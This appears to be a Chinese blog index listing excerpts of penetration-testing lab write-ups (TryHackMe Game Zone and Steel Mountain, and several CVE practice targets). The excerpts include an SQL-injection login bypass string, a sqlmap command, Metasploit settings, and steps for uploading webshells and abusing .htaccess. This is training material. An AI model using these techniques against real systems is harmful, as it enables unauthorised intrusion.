- 博客(10)
- 收藏
- 关注
RSS订阅原创 tryhackme gamezone 渗透测试
ssh -L 10000:localhost:10000 agent47@10.10.112.19,将目标系统的10000端口映射到本地10000端口,在访问本地的10000端口,进而访问服务。另一个表 sqlmap -r Ganmzone.txt --dbms=mysql -D=db --tables。2、在登录界面使用万能密码登录 用户名: 'or 1=1 -- - 密码为空。存在漏洞 ,编号为CVE-2012-2982。使用msf ,搜索漏洞编号,使用对应模块,
2023-12-24 20:50:21
414
原创 tryhackme Steel Mountain渗透测试
为了枚举这台机器,我们将使用一个名为 PowerUp 的 powershell 脚本,其目的是评估 Windows 机器并确定任何异常情况 - PowerUp 的目标是 成为依赖错误配置的常见 Windows 权限升级向量的交换所。,use 0,show options,set rhost 10.10.109.202 ,set RPORT 8080,set lhost 10.11.63.209 run运行。找到user.txt,使用cat 命令查看,不知为啥我打不开,直接用shell查看了。
2023-12-19 16:15:26
1384
1
原创 使用 ProFtpd 获得初始访问权限
ProFtpd是一个免费、开源的FTP服务器,兼容Unix和Windows系统。它在过去的软件版本中也存在漏洞。
2023-12-19 11:07:43
357
1
原创 春秋云境cuppa CMS任意文件读取 CVE-2022-25401
访问url尝试进行弱口令登录,登录不成功。直接尝试访问right.php。利用curl命令获取flag。
2023-09-07 14:21:28
189
原创 春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)
使用poc CVE-2022-29464进行post上传木马webshell。运行完成访问运行结果的url。
2023-07-20 15:47:22
406
1
原创 春秋云境CVE-2022-25578
执行AddType application/x-httpd-php .jpg命令,即将目录下jgp文件执行为php文件。4、“文件管理” - “.htaccess”,对.htaccess文件进行编辑,使其能够执行任意代码。taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码。使用弱口令登录都不行,最后在源代码中找到登录密码。3、 使用admin/tao登录成功。5、在“添加文章”上传图片马。2、查看admin页面。
2023-07-06 17:23:31
59
1
原创 春秋云境靶场CVE-2022-28525
CVE-2022-28525 (ED01-CMS v20180505 存在任意文件上传漏洞)4、点击edit,进行编辑,填写password,并上传文件,使用burpsuit抓包。在users/view all users 找到上传页面,6、审查图片元素发现文件路径在/images/ 路径下。3、因为是任意文件上传漏洞,在各页面查找上传接口。2、尝试弱口令admin/admin登录。test.php内容如下。
2023-07-06 16:14:50
184
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人